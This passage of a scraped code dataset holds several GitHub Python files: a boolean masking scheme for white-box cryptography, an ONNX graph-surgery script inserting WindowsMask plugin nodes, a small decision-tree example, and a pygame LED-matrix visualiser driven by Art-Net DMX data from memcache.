nshares=2):\n \"\"\"rand() -> random bit\"\"\"\n self.rand = rand\n self.nshares = int(nshares)\n assert nshares >= 2 # maybe 1 is useful for debugging purposes?\n\n def encode(self, x):\n raise NotImplementedError()\n\n def decode(self, x):\n raise NotImplementedError()\n\n def refresh(self, x):\n raise NotImplementedError()\n\n def __repr__(self):\n return \"<%s nshares=%s rand=%r>\" % (type(self).__name__, self.nshares, self.rand)\n\n\nclass DOM(MaskingScheme):\n def encode(self, s):\n x = [self.rand() for _ in xrange(self.nshares-1)]\n x.append(reduce(xor, x) ^ s)\n return tuple(x)\n\n def decode(self, x):\n return reduce(xor, x)\n\n def XOR(self, x, y):\n assert len(x) == len(y) == self.nshares\n return tuple(xx ^ yy for xx, yy in zip(x, y))\n\n def AND(self, x, y):\n assert len(x) == len(y) == self.nshares\n matrix = [[xx & yy for yy in y] for xx in x]\n for i in xrange(1, self.nshares):\n for j in xrange(i + 1, self.nshares):\n r = self.rand()\n matrix[i][j] ^= r\n matrix[j][i] ^= r\n return tuple(reduce(xor, row) for row in matrix)\n\n def NOT(self, x):\n assert len(x) == self.nshares\n return (~x[0],) + tuple(x[1:])\n\n def RANDOM(self):\n # more efficient random shares\n Bit = self.Bit\n return (Bit.const(0),) * (self.nshares - 1) + (Bit(Bit.OP.RANDOM),)\n\n def refresh(self, x):\n raise NotImplementedError()\n\nclass MINQ(MaskingScheme):\n def __init__(self, rand):\n super(MINQ, self).__init__(rand=rand, nshares=3)\n\n def encode(self, s):\n a = self.rand()\n b = self.rand()\n c = (a & b) ^ s\n return a, b, c\n\n def decode(self, x):\n return (x[0] & x[1]) ^ x[2]\n\n def rand3(self):\n return (self.rand(), self.rand(), self.rand())\n\n def refresh(self, x, rs=None):\n a, b, c = x\n if rs is None:\n rs = self.rand3()\n ra, rb, rc = rs\n ma = ra & (b ^ rc)\n mb = rb & (a ^ rc)\n rmul = (ra ^ rc) & (rb ^ rc)\n rc ^= ma ^ mb ^ rmul\n a ^= ra\n b ^= rb\n c ^= rc\n return a, b, c\n\n def XOR(self, x, y):\n rxs = ra, rb, rc = self.rand3()\n rys = rd, re, rf = self.rand3()\n a, b, c = self.refresh(x, rs=rxs)\n d, e, f = self.refresh(y, rs=rys)\n x = a ^ d\n y = b ^ e\n ae = a & e\n bd = b & d\n z = c ^ f ^ ae ^ bd\n return x, y, z\n\n def AND(self, x, y):\n rxs = ra, rb, rc = self.rand3()\n rys = rd, re, rf = self.rand3()\n a, b, c = self.refresh(x, rs=rxs)\n d, e, f = self.refresh(y, rs=rys)\n\n ma = (b & f) ^ (rc & e)\n md = (c & e) ^ (rf & b)\n x = rf ^ (a & e)\n y = rc ^ (b & d)\n ama = a & ma\n dmd = d & md\n rcrf = rc & rf\n cf = c & f\n z = ama ^ dmd ^ rcrf ^ cf\n return x, y, z\n\n def NOT(self, x):\n return x[0], 
x[1], ~x[2]\n\n def RANDOM(self):\n # more efficient random shares\n Bit = self.Bit\n return Bit.const(0), Bit.const(0), Bit(Bit.OP.RANDOM())\n\n\n\ndef mask_circuit(ybits, scheme, encode=True, decode=True):\n \"\"\"\n Mask a given circuit with a given masking scheme.\n WARNING: assumes absence of constant bits (e.g. using OptBitNode)\n \"\"\"\n scheme.Bit = Bit = type(ybits[0])\n\n xbits = circuit_inputs(ybits)\n if encode:\n xbits_shares = [scheme.encode(xbit) for xbit in xbits]\n else:\n xbits_shares = [Bit.inputs(xbit.name(), tostr=False) for xbit in xbits]\n\n shares = dict(zip(xbits, xbits_shares)) # bit -> shares of bit\n\n for action, bit in Orderer(ybits, quiet=True).compile().code:\n if action != \"compute\":\n continue\n\n func = getattr(scheme, Bit.OP.name[bit.op])\n args = [shares[arg] for arg in bit.args]\n res = func(*args)\n shares[bit] = res\n\n ybits_shares = tuple(shares[ybit] for ybit in ybits)\n if decode:\n return tuple(scheme.decode(yshares) for yshares in ybits_shares)\n else:\n return ybits_shares\n","repo_name":"cryptolu/whitebox","sub_path":"synthesis/whitebox/masking.py","file_name":"masking.py","file_ext":"py","file_size_in_byte":4402,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"61"} +{"seq_id":"23941383505","text":"import argparse\nimport onnx\nimport onnx_graphsurgeon as gs\nimport numpy as np\n\nfrom collections import OrderedDict\nimport sys\nsys.path.append('/root/hx/NVHackathonCompetition/')\nfrom utils.print_color_txt import colorstr\n\n\ndef surgeon(onnx_path):\n # load the .onnx model and adjust the graph\n graph = gs.import_onnx(onnx.load(onnx_path))\n print(colorstr('Loaded model: ')+onnx_path,\"node count:\",colorstr('red',str(len(graph.nodes))))\n # search downwards starting from slice45\n ConstantOfShapeNode = None\n ShapeNode = None\n ScatterNDNode = None\n\n nWindowsMask = 0\n # ------------------------------------------------------ insert the shift_window plugin\n for node_id, node in enumerate(graph.nodes):\n\n if node.name == \"ConstantOfShape_1032\": \n ConstantOfShapeNode = node\n if node.name == \"Shape_1078\": \n ShapeNode = node\n if node.name == \"ScatterND_1995\": \n ScatterNDNode = node\n\n if ConstantOfShapeNode is not None and ShapeNode is not None and ScatterNDNode is not None:\n img_mask = ConstantOfShapeNode.outputs[0]\n img_mask_shape = ShapeNode.outputs[0]\n WindowsMaskN = gs.Node(\"WindowsMask\", \"WindowsMask_\" + str(nWindowsMask), inputs=[img_mask, img_mask_shape], outputs=[ScatterNDNode.outputs[0]])\n\n WindowsMaskN.attrs = OrderedDict(\n window_size = np.array([8],dtype=np.int32),\n shift_size = np.array([4],dtype=np.int32),\n plugin_version = \"1\",\n plugin_namespace = \"\"\n )\n\n graph.nodes.append(WindowsMaskN)\n nWindowsMask += 1\n ScatterNDNode.outputs = []\n # ------------------------------------------------------ insert the plugin without shift\n ConstantOfShapeNode = None\n ShapeNode = None\n ScatterNDNode = None\n\n for node in graph.nodes:\n if node.name == \"ConstantOfShape_63\": \n ConstantOfShapeNode = node\n if node.name == \"Shape_109\":\n ShapeNode = node\n if node.name == \"ScatterND_966\": \n ScatterNDNode = node\n\n if ConstantOfShapeNode is not None and ShapeNode is not None and ScatterNDNode is not None:\n img_mask = ConstantOfShapeNode.outputs[0]\n img_mask_shape = ShapeNode.outputs[0]\n\n WindowsMaskN = gs.Node(\"WindowsMask\", \"WindowsMask_\" + str(nWindowsMask), inputs=[img_mask, img_mask_shape], outputs=[ScatterNDNode.outputs[0]])\n WindowsMaskN.attrs = OrderedDict(\n window_size = np.array([8],dtype=np.int32),\n shift_size = np.array([0],dtype=np.int32),\n plugin_version = \"1\",\n plugin_namespace = \"\"\n )\n graph.nodes.append(WindowsMaskN)\n nWindowsMask += 1\n ScatterNDNode.outputs.clear()\n # ------------------------------------------------------end\n print('Finished replacing '+colorstr('red',str(nWindowsMask))+' WindowsMask nodes')\n # print(f\"nWindowsMask: {nWindowsMask}\")\n\n graph.cleanup().toposort()\n surgeon_onnx_path = onnx_path.replace(\".onnx\", \"_mask.onnx\")\n onnx.save(gs.export_onnx(graph), surgeon_onnx_path)\n print(colorstr(\"New model node count:\") ,colorstr('red',str(len(graph.nodes))) )\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--onnxFile\", type=str, default=\"./onnx_zoo/SwinIR_LN.onnx\",\n help=\"onnx file path.\")\n args = parser.parse_args()\n surgeon(args.onnxFile)\n","repo_name":"hhhhhanxu/NVHackathonCompetition","sub_path":"make_surgeon/onnx_surgeon_mask.py","file_name":"onnx_surgeon_mask.py","file_ext":"py","file_size_in_byte":3409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39082503183","text":"#import statements\nimport numpy as np\nimport collections\nimport pydotplus\nfrom sklearn import tree\nimport graphviz\n\n# Data Collection\nX = [ [0,0],\n [1,0],\n [1,1],\n [2,1],\n [2,1],\n [2,0]]\n\nrain = np.array(['not rain', 'not rain', 'not rain', 'rain', 'rain', 'not rain'])\ndata_feature_names = [ 'weather_type', 'atmospheric_pressure']\n\n# Training\nclf = tree.DecisionTreeClassifier()\nclf = clf.fit(X,rain)\n\n# Visualize data\ndot_data = tree.export_graphviz(clf,\n feature_names=data_feature_names,\n out_file=None,\n filled=True,\n rounded=True)\ngraph = pydotplus.graph_from_dot_data(dot_data)\n\ncolors = ('turquoise', 'orange')\nedges = collections.defaultdict(list)\n\nfor edge in graph.get_edge_list():\n edges[edge.get_source()].append(int(edge.get_destination()))\n\nfor edge in edges:\n edges[edge].sort()\n for i in range(2):\n dest = graph.get_node(str(edges[edge][i]))[0]\n dest.set_fillcolor(colors[i])\n\ngraph.write_png('tree.png')\n","repo_name":"srinidhi151/Book","sub_path":"Part 2/Chapter 10/Decision_tree_classification_example_in_python(Listing_4).py","file_name":"Decision_tree_classification_example_in_python(Listing_4).py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"14690766717","text":"\nimport math\nimport random\nimport time\nimport os\n\nHOME = os.getenv('HOME')\n\nfrom optparse import OptionParser\n...\nparser = OptionParser()\nparser.add_option(\"-m\", \"--mode\", dest=\"mode\",\n help=\"pixel mode\") #, metavar=\"FILE\")\n\nparser.add_option(\"-X\", \"--XX\", dest=\"XX\", #default=1,\n help=\"x-split\") #, metavar=\"FILE\")\n\nparser.add_option(\"-x\", \"--xx\", dest=\"xsplit\", #default=1,\n help=\"x-split\") #, metavar=\"FILE\")\nparser.add_option(\"-y\", \"--yy\", dest=\"ysplit\",#default=1,\n help=\"y-split\") #, metavar=\"FILE\")\n\n#parser.add_option(\"-f\", \"--file\", dest=\"filename\",\n# help=\"write report to FILE\", metavar=\"FILE\")\n#parser.add_option(\"-q\", \"--quiet\",\n# action=\"store_false\", dest=\"verbose\", default=True,\n# help=\"don't print status messages to stdout\")\n\n(options, args) = parser.parse_args()\n\nSTART = time.time()\n\n\n# ===== ARTNET DMX =========\n\nimport memcache\nmc = memcache.Client(['127.0.0.1:11211'], debug=0)\n\ndef read_index():\n ips=mc.get(\"index\")#cmd)\n if ips is None:\n ips = {}\n\n #for k,v in 
ips.items():\n # print(k,v)\n return ips\n\ndef select_ip(ips, univ=2): # artnet univ\n _univ = \":{}\".format(univ)\n for ip in ips: #high priority\n if \"2.0.0\" in ip and _univ in ip:\n return ip\n\n for ip in ips:\n if \"ltp-out\" in ip and _univ in ip:\n return ip\n\nFUNC = 0\n\n\n\ndef read_dmx(ip):\n global frame\n r = \"\"\n if ip:\n #t = int(math.sin(time.time() - s)*10)\n r = mc.get(ip) #\"2.0.0.13:2\")\n frame += 1\n rr = [0]*512\n for i,v in enumerate(r):\n try: #cleanup ltp-out to int\n v = int(v)\n rr[i] = v\n except:pass\n r = rr\n\n\n if not r:\n c = 0\n #time.sleep(0.1)\n r = [0] *512\n for i in range(12*8+1):\n dmx = i*4\n #print(dmx)\n r[dmx:dmx+4] = [255,10,10,40] \n return r\n\n\n\n# ===== ARTNET DMX =========\n\n\n\np = 16\nblock = [p,p]\n_x = 8\n_y = 8\n\n\n#HD = \"0\"\nif options.mode:\n try:\n HD = options.mode\n p,_x,_y = HD.split(\",\")\n _x = int(_x)\n _y = int(_y)\n p = int(p)\n block = [p,p]\n except Exception as e:\n print( \"Exc\",options.mode,e)\n\nHD_x = 2\nHD_y = 2\n\nprint( [options.xsplit])\nprint( [options.ysplit])\n\ntry:\n if options.xsplit:\n HD_x = int(options.xsplit)\n if options.ysplit:\n HD_y = int(options.ysplit)\nexcept Exception as e:\n print( \"Exc\",options.mode,e)\n\nprint(\"HD\",HD_x,HD_y)\nprint(\"xy\",_x,_y)\nprint(\"++++++++++++++++++\", p,_x,_y)\n\n_x2 = _x\n\ntry:\n if options.XX:\n _x2 = int(options.XX)\nexcept Exception as e:\n print( \"Exc\",options.mode,e)\nprint(\"_x2 , -X\",_x2)\n# ===== GUI =========\nimport pygame\nimport pygame.gfxdraw\nimport pygame.font\n\nos.environ['SDL_VIDEO_WINDOW_POS'] = '%i,%i' % (200,164)\nos.environ['SDL_VIDEO_CENTERED'] = '0'\n\npg = pygame\npygame.init()\npygame.mixer.quit()\n\n\nf = pygame.font.get_fonts()\nfor i in f:\n if \"mono\" in i.lower():\n print(i)\n \n\nfont = pygame.font.SysFont(\"freemonobold\",22)\nfont10 = pygame.font.SysFont(\"freemonobold\",10)\nfont12 = pygame.font.SysFont(\"freemonobold\",12)\nfont15 = pygame.font.SysFont(\"freemonobold\",15)\n#font = pygame.font.SysFont(None,30)\n\nfr = font.render(\"hallo\" ,1, (200,0,255))\n\n\n\n\n\nmain_size=(600,500)\ntry:\n wx = 100+block[0] * _x\n wy = 100+block[1] * _y\n main_size=(wx,wy)\n\nexcept Exception as e:\n print(\"Exception:\",e)\n#main_size=(280,200)\n\nwindow = pygame.display.set_mode(main_size,pg.RESIZABLE)#,32)#,pygame.FULLSCREEN) #x left->right ,y top-> bottom\npg.display.set_caption('LibreLight LED-SCREEN')\n\n\nclass Fix():\n def __init__(self,_id,pos,block=[16,16],univ=0,dmx=0,ch=4):\n #print(\"Fix\",_id)\n self._id = _id\n self.dmx = (_id-1) * ch +1 #dmx\n self.univ = univ\n self.ch = ch\n self.pos = pos\n self.rgb = [0,0,0]\n self.block = block #[10,10]\n self.x = pos[0]\n self.y = pos[1]\n self.strobo = time.time()\n self.bmp = 250\n self.sub_fix = []\n \n sub_block =[block[0]/HD_x,block[1]/HD_y] \n if _id <= 0: #exit \n return\n\n spalte = (_id-1)%_y +1\n zeile = int((_id-1)/_x2) #+1\n #zeile = zeile*_x*HD_x*HD_y\n\n add_row = _x*HD_x*HD_y\n\n #zeile 1\n sid = (_id-1)*2 + zeile*HD_x*_x2\n #for i in range(1,HD_x):\n sid = sid+1\n #sid = zeile\n sub_pos= [pos[0]*block[0],pos[1]*block[1]]\n sub_fix = SubFix(sid,sub_pos,sub_block,univ,dmx,ch)\n self.sub_fix.append(sub_fix)\n\n sid = sid+1\n #sid = zeile\n sub_pos= [pos[0]*block[0]+block[0]/2,pos[1]*block[1]]\n sub_fix = SubFix(sid,sub_pos,sub_block,univ,dmx,ch)\n self.sub_fix.append(sub_fix)\n\n #zeile 2\n sid = (_id-1)*2+1 + _x2*HD_x + zeile*HD_x*_x2 # int(add_row)\n #sid = sid+1\n #sid = HD_x\n sub_pos= [pos[0]*block[0],pos[1]*block[1]+block[1]/2]\n sub_fix = 
SubFix(sid,sub_pos,sub_block,univ,dmx,ch)\n self.sub_fix.append(sub_fix)\n\n #sid = sid+1\n sid = sid+1 \n sub_pos= [pos[0]*block[0]+block[0]/2,pos[1]*block[1]+block[1]/2]\n sub_fix = SubFix(sid,sub_pos,sub_block,univ,dmx,ch)\n self.sub_fix.append(sub_fix)\n\n\n def calc(self,data):\n _rgb = [0,255,0]\n return _rgb\n\n def sub_calc(self,data):\n _rgb = [0,255,0]\n for sub_fix in self.sub_fix:\n sub_fix.block = self.block[:]\n _rgb = sub_fix.calc(data)\n return _rgb\n \n \n def POS(self,x=0,y=0,a=0,b=0):\n A = (self.pos[0])*self.block[0]\n B = (self.pos[1])*self.block[1]\n C = self.block[0]-a\n D = self.block[1]-b\n return [x+A,y+B,C,D]\n\n def subPOS(self,x=0,y=0,a=0,b=0):\n __out = []\n for sub_fix in self.sub_fix:\n __out.append( sub_fix.POS(x,y,a,b) )\n return __out \n\n\nclass SubFix():\n def __init__(self,_id,pos,block=[16,16],univ=0,dmx=0,ch=4):\n #print(\"Fix\",_id)\n self._id = _id\n self.dmx = (_id-1) * ch +1 #dmx\n self.univ = univ\n self.ch = ch\n self.pos = pos\n self.rgb = [0,0,40]\n self.block = block #[10,10]\n self.x = pos[0]\n self.y = pos[1]\n self.strobo = time.time()\n self.bmp = 250\n\n def calc(self,data):\n #return [130,30,20]\n dmx_sub = [30]*10\n #print(dmx_sub)\n dmx = self.dmx -1\n _dmx_sub = []\n if self.dmx >= 0:\n dmx = rDMX(self.univ,self.dmx)-1\n if dmx+self.ch < len(data):\n _dmx_sub = data[dmx:dmx+self.ch]\n if _dmx_sub:\n dmx_sub = _dmx_sub\n #print(dmx_sub)\n dim = dmx_sub[0]/255\n\n #print(\"dmx\",dmx,dmx_sub)\n r = dmx_sub[1]*dim\n g = dmx_sub[2]*dim\n b = dmx_sub[3]*dim\n\n r = int(r)\n g = int(g)\n b = int(b)\n self.rgb = [r,g,b]\n return self.rgb\n \n def POS(self,x=0,y=0,a=0,b=0):\n A = (self.pos[0]) #+self.block[0]\n B = (self.pos[1]) #+self.block[1]\n C = self.block[0]-a\n D = self.block[1]-b\n if NR:\n C-=1\n D-=1\n return [int(x+A),int(y+B),int(C),int(D)]\n\nclass POINTER():\n def __init__(self):\n self.pos = [0,0,0,0]\n self.on = 0\n self.rgb = [0,100,10]\n self._x = 0\n self._y = 0\n self.x = 0\n self.y = 0\n self.fix = Fix(0 ,[999,999],[16,16],0,0,0)\n\n def row_move(self,x,y):\n self._x = x\n self._y = y\n def move(self,pos):\n self.pos = pos\n self.on = 1\n def cross(self,x,y):\n self.x = x\n self.y = y\n\n def draw(self):\n if self.on:\n pygame.draw.rect(window,self.rgb,self.pos)\n #pygame.draw.line(window,self.rgb, (self.pos[0],self.pos[1]) , (self.pos[0]+100,self.pos[1]) ) \n\n \n # mouse grid posision\n fr = font15.render(\"{}/{}\".format(self.fix.x+1,self.fix.y) ,1, (200,200,200))\n \n _nr = self.fix.y * _x + self.fix.x +1\n #fr = font15.render(\"{:02} {}/{}\".format(_nr, self.fix.x+1,self.fix.y+1 ) ,1, (200,200,200))\n fr = font15.render(\"{:02}\".format(_nr ) ,1, (200,200,200))\n\n window.blit(fr,(self.pos[0]+2,self.pos[1]+2 ))\n window.blit(fr,(200,25))\n\n # fix pos\n txt=str(self.pos)\n fr = font15.render(txt ,1, (200,200,200))\n #window.blit(fr,(self.pos[0]+2,self.pos[1]+2 ))\n window.blit(fr,(200,10))\n\n # univers\n #fr = font15.render(\"{:02}:{:03}\".format(self.fix.univ,self.fix.dmx) ,1, (200,200,200))\n #window.blit(fr,(300,10))\n \n # pointer\n fr = font15.render(\"X:{:03}\".format(self._x) ,1, (200,200,200))\n window.blit(fr,(10,30))\n fr = font15.render(\"Y:{:03}\".format(self._y) ,1, (200,200,200))\n window.blit(fr,(10,40))\n\n # crosshair\n self.rgb = [0,0,200]\n pygame.draw.line(window,self.rgb, (self.x-p,self.y) , (self.x-2,self.y) ) \n pygame.draw.line(window,self.rgb, (self.x,self.y-p) , (self.x,self.y-2) ) \n\n self.rgb = [0,200,0]\n pygame.draw.line(window,self.rgb, (self.x+2,self.y) , (self.x+p,self.y) ) \n 
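# the matching green arm below the cursor follows; together with the blue left/up arms this completes the crosshair\n 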
pygame.draw.line(window,self.rgb, (self.x,self.y+2) , (self.x,self.y+p) ) \n self.rgb = [200,0,0]\n\npointer = POINTER()\n\nNR = 0\n\nrunning = True\ndef event():\n global NR,running\n for event in pygame.event.get(): \n #print(event.dict)\n\n _button = None\n if \"button\" in event.dict:\n _button = event.dict[\"button\"]\n\n _state = None\n if \"state\" in event.dict:\n _state = event.state \n\n _key = None\n if \"key\" in event.dict:\n _key = event.key \n\n _pos = None\n if \"pos\" in event.dict:\n _pos = event.pos \n\n _type = None\n if \"type\" in event.dict:\n _type = event.type \n _type = event.type \n\n _mod = None\n if \"mod\" in event.dict:\n _mod = event.mod \n print( \" \")\n print( \"{:.02f}\".format( time.time() - START ))\n print(\"button -\",_button,end=\"\\t| \")\n #print(\"state -\",_state)\n print(\"pos -\",_pos)\n print(\"type -\",_type, end=\"\\t| \")\n print(\"key -\",_key)\n print(\"mod -\",_mod)\n\n try:\n if _type == 5:\n if _button == 1:\n NR += 1\n if NR > 1:\n NR = 0\n if _button == 3:\n NR -= 1\n if NR < 0:\n NR = 1\n\n if _pos:\n posA = _pos \n fix = find_pix(_pos[0]-40,_pos[1]-60)\n if fix:\n pos = fix.POS(40,60) \n rgb = [0,0,0] \n pointer.move(pos) \n pointer.fix = fix\n else:\n pointer.on = 0\n pointer.row_move(_pos[0],_pos[1]) \n pointer.cross(_pos[0],_pos[1])\n\n if event.type == pygame.VIDEORESIZE:\n window = pygame.display.set_mode((event.w, event.h), pygame.RESIZABLE)\n except Exception as e:\n print(e)\n\n if event.type==pygame.QUIT: \n running=False\n\n\nfps = 0\nframe = 0\nframe_t = time.time()\nIP = \"yyy\"\ndef draw_overlay():\n global fps\n fr = font.render(\"FPS:{}\".format(fps) ,1, (200,0,255))\n window.blit(fr,(10,10))\n\n fr = font.render(\"ip:{}\".format(IP) ,1, (200,0,255))\n window.blit(fr,(80,10))\n\ndef calc_fps():\n global fps,frame,frame_t\n t = time.time()\n if frame_t+1 < t:\n fps = frame #frame_t- t #frame\n frame = 1\n frame_t = time.time()\n\n# ===== GUI =========\n\n\n#def draw_circle(surface, x, y, radius, color):\ndef draw_circle(surface,color, pos, radius):\n x,y=pos\n pygame.gfxdraw.aacircle(surface, int(x), int(y), radius-1, color)\n pygame.gfxdraw.filled_circle(surface, int(x), int(y), radius-1, color)\n\ndef rDMX(univ,dmx):\n return univ*512+dmx\n\ngrid_file = \"/tmp/vpu_grid.csv\"\ngrid_file = HOME+\"/LibreLight/vpu_grid_hd.csv\"\n\ndef generate_grid():\n log = open(grid_file,\"w\")\n head = \"i,univ,dmx,x,y,ch\\n\"\n head = \"i,univ,dmx,ch\\n\"\n head = \"univ,dmx,x,y,ch\\n\"\n head = \"nr,id,info\\n\"\n print(\"csv:\",head)\n log.write(head)\n dmx = 1-1\n ch = 4\n\n y=0\n x=0\n for i in range((_y)*(_x)):\n if x > _x and i%_x == 0:\n print(\"--> -->\")\n x=0\n y+=1\n \n _univ = int(dmx/512)\n _dmx = dmx - (_univ)*512 \n\n pos=[x,y]\n line=\"{},{},{},{},{},{}\\n\".format(i+1,_univ,_dmx+1,pos[0],pos[1],ch)\n line=\"{},{},{},{},{}\\n\".format(_univ,_dmx+1,x,y,ch)\n line=\"{},{},x\\n\".format(i+1,i+1)\n print(\"wcsv:\",[line])\n log.write(line)\n dmx += ch\n x+=1\n log.close()\n return GRID\n\ndef init_grid():\n\n try:\n log = open(grid_file,\"r\")\n except:\n generate_grid()\n log = open(grid_file,\"r\")\n \n lines = log.readlines()\n\n GRID = []\n \n y=0\n x=0\n print(\"CSV header\",[lines[0]])\n\n for i,line in enumerate(lines[1:]): #exclude first line\n #print(\"rcsv\",[line])\n line = line.strip()\n line = line.split(\",\") # csv\n\n if i >= _x and i%_x == 0:\n x=0\n y+=1\n if y > _y:\n break\n\n\n #i = int(line[0])\n _id = int(line[1])\n #univ = int(line[0])\n #dmx = int(line[1])\n #x = int(line[3])\n #y = 
int(line[4])\n #ch = int(line[4])\n\n pos = [x,y] \n f = Fix(_id,pos,block) #pos,univ,dmx,ch)\n #f.x = x\n #f.y = y \n #f.block = block\n GRID.append(f)\n x+=1\n #print(\"y, _y\",y,_y)\n return GRID\n\ndef find_pix(x,y):\n global GRID\n for fix in GRID:\n X = 0\n Y = 0\n\n pos = fix.POS()\n if x > pos[0] and x < pos[0]+pos[2]:\n X = 1\n if y > pos[1] and y < pos[1]+pos[3]:\n Y = 1\n if X and Y:\n print(pos,x,y)\n print(\"find\",X,Y)\n return fix\n \ndef draw_gobo(window,FUNC,spos,srgb):\n #print(fix.dmx,rgb,pos)\n #pygame.draw.circle(window,rgb,(pos[0]+int(pos[2]/2),pos[1]+int(pos[3]/2)),int(pos[3]/2))\n if FUNC > 10 and FUNC <= 20: # big dot\n draw_circle(window,srgb,(spos[0]+int(spos[2]/2),spos[1]+int(spos[3]/2)),int(spos[3]/2))\n elif FUNC > 20 and FUNC <= 30:#small dot\n draw_circle(window,srgb,(spos[0]+int(spos[2]/2),spos[1]+int(spos[3]/2)),int(spos[3]/3.5))\n elif FUNC > 30 and FUNC <= 40:#donut\n draw_circle(window,srgb,(spos[0]+int(spos[2]/2),spos[1]+int(spos[3]/2)),int(spos[3]/2))\n draw_circle(window,[0,0,0],(spos[0]+int(spos[2]/2),spos[1]+int(spos[3]/2)),int(spos[3]/3.5))\n elif FUNC > 40 and FUNC <= 50: # rec with hole\n pygame.draw.rect(window,srgb,spos)\n draw_circle(window,[0,0,0],(spos[0]+int(spos[2]/2),spos[1]+int(spos[3]/2)),int(spos[3]/3.5))\n elif FUNC > 50 and FUNC <= 60: # rec with big hole\n pygame.draw.rect(window,srgb,spos)\n draw_circle(window,[0,0,0],(spos[0]+int(spos[2]/2),spos[1]+int(spos[3]/2)),int(spos[3]/2))\n elif FUNC > 60 and FUNC <= 70: # rec with donat\n pygame.draw.rect(window,srgb,spos)\n draw_circle(window,[0,0,0],(spos[0]+int(spos[2]/2),spos[1]+int(spos[3]/2)),int(spos[3]/2))\n draw_circle(window,srgb,(spos[0]+int(spos[2]/2),spos[1]+int(spos[3]/2)),int(spos[3]/3.5))\n elif FUNC > 70 and FUNC <= 80: # rec boarder\n pygame.draw.rect(window,srgb,[spos[0]+1,spos[1]+1,spos[2]-2,spos[3]-2])\n elif FUNC > 80 and FUNC <= 90: # rec big boarder\n pygame.draw.rect(window,srgb,[spos[0]+2,spos[1]+2,spos[2]-4,spos[3]-4])\n elif FUNC > 90 and FUNC <= 100: # rec thin line\n pygame.draw.rect(window,srgb,spos)\n pygame.draw.rect(window,[0,0,0],[spos[0]+1,spos[1]+1,spos[2]-2,spos[3]-2])\n elif FUNC > 100 and FUNC <= 110: # rec big line\n pygame.draw.rect(window,srgb,spos)\n pygame.draw.rect(window,[0,0,0],[spos[0]+2,spos[1]+2,spos[2]-4,spos[3]-4])\n elif FUNC > 110 and FUNC <= 120: # rec with dot\n pygame.draw.rect(window,srgb,spos)\n pygame.draw.rect(window,[0,0,0],[spos[0]+1,spos[1]+1,spos[2]-2,spos[3]-2])\n draw_circle(window,srgb,(spos[0]+int(spos[2]/2),spos[1]+int(spos[3]/2)),int(spos[3]/3.5))\n elif FUNC > 120 and FUNC <= 130: # rec inline\n pygame.draw.rect(window,srgb,[spos[0]+2,spos[1]+2,spos[2]-4,spos[3]-4])\n pygame.draw.rect(window,[0,0,0],[spos[0]+3,spos[1]+3,spos[2]-6,spos[3]-6])\n elif FUNC > 130 and FUNC <= 140: # 3 dot (heart)\n draw_circle(window,srgb,(spos[0]+int(spos[2]/2)+2,spos[1]+int(spos[3]/2)),int(spos[3]/3.5))\n draw_circle(window,srgb,(spos[0]+int(spos[2]/2)-2,spos[1]+int(spos[3]/2)),int(spos[3]/3.5))\n draw_circle(window,srgb,(spos[0]+int(spos[2]/2),spos[1]+int(spos[3]/2)+2),int(spos[3]/3.5))\n else:\n pygame.draw.rect(window,srgb,spos)\n\n\n\nGRID = []\nNR = 0\nSTART_UNIV=2\n\ndef main():\n global IP,GRID,FUNC\n\n counter = time.time()\n GRID = init_grid() #init_gird()\n print(\"GRID LEN:\",len(GRID))\n\n\n s=time.time()\n print(\"run\")\n r = \"\"\n IP = \"xx\"\n while running:\n pygame.display.flip()\n event()\n\n window.fill((0,0,0))\n calc_fps()\n draw_overlay()\n\n ips = read_index()\n ip = select_ip(ips,univ=START_UNIV)\n IP = ip\n 
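# read three consecutive Art-Net universes starting at START_UNIV and concatenate their 512-channel frames into one flat list\n 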
#print(\"IP\",ip)\n\n data = read_dmx(ip)\n\n ip = select_ip(ips,univ=START_UNIV+1)\n data3 = read_dmx(ip)\n data.extend(data3)\n\n ip = select_ip(ips,univ=START_UNIV+2)\n data3 = read_dmx(ip)\n data.extend(data3)\n\n #ip = select_ip(ips,univ=START_UNIV+4)\n #data3 = read_dmx(ip)\n #data.extend(data3)\n # GRID loop\n try:\n ddd = 1023 #univ 3 512\n FUNC = data[ddd]\n #print(\"FUNC\", FUNC )#:ddd+512])\n #FUNC = 15\n except Exception as e:\n print(\"EXC FUNC\",e)\n i = 0\n dmx = 1\n h = 1\n v = 1\n for fix in GRID:\n pos = fix.POS(40,60)\n rgb = fix.rgb\n\n\n if 1:\n # draw row/col grid number\n if fix.pos[0] == 0:\n fr = font12.render(\"{}\".format(fix.pos[1]+1) ,1, (200,200,200))\n window.blit(fr,(10,pos[1]+3 ))\n if fix.pos[1] == 0:\n fr = font12.render(\"{}\".format(fix.pos[0]+1) ,1, (200,200,200))\n window.blit(fr,(pos[0]+2,35 ))\n\n pygame.draw.rect(window,rgb,pos)\n\n\n # DRAW SUB-FIXTURE\n j = 0\n for subfix in fix.sub_fix:#calc(data):\n subfix.calc(data)\n #fix = subfix\n spos = subfix.POS(40,60)\n srgb = subfix.rgb\n \n draw_gobo(window,FUNC,spos=spos,srgb=srgb)\n\n\n\n\n # draw row/col grid number\n if subfix.pos[0] == 0:\n fr = font12.render(\"{}\".format(v ) ,1, (200,200,200))\n window.blit(fr,(25,spos[1] ))\n v += 1\n if subfix.pos[1] == 0:\n fr = font12.render(\"{}\".format(1) ,1, (200,200,200))\n fr = font12.render(\"{}\".format(h ) ,1, (200,200,200))\n h+=1\n window.blit(fr,(spos[0],50 ))\n\n\n if p >= 40:\n if NR:\n #fr = font15.render(\"{:02}\".format(j+1) ,1, (0,200,255))\n fr = font15.render(\"{:02}\".format(subfix._id) ,1, (250,200,5))\n window.blit(fr,(spos[0]+2,spos[1]+10))\n j += 1\n i += 1\n\n\n # DRAW FIX NUMBER on TOP\n i=0\n for fix in GRID:\n pos = fix.POS(40,60)\n rgb = fix.rgb\n if NR:\n pygame.draw.rect(window,[0,0,0],[pos[0]+2,pos[1]+2,12,9])\n\n #if NR == 1:\n # fr = font15.render(\"{:02}\".format(i+1) ,1, (200,0,255))\n # window.blit(fr,(pos[0]+2,pos[1]+2))\n #elif NR == 2:\n if NR:# == 2:\n if counter +5 < time.time():\n counter = time.time()\n try:\n GRID = init_grid() #init_gird()\n except Exception as e:\n print(\"Except: 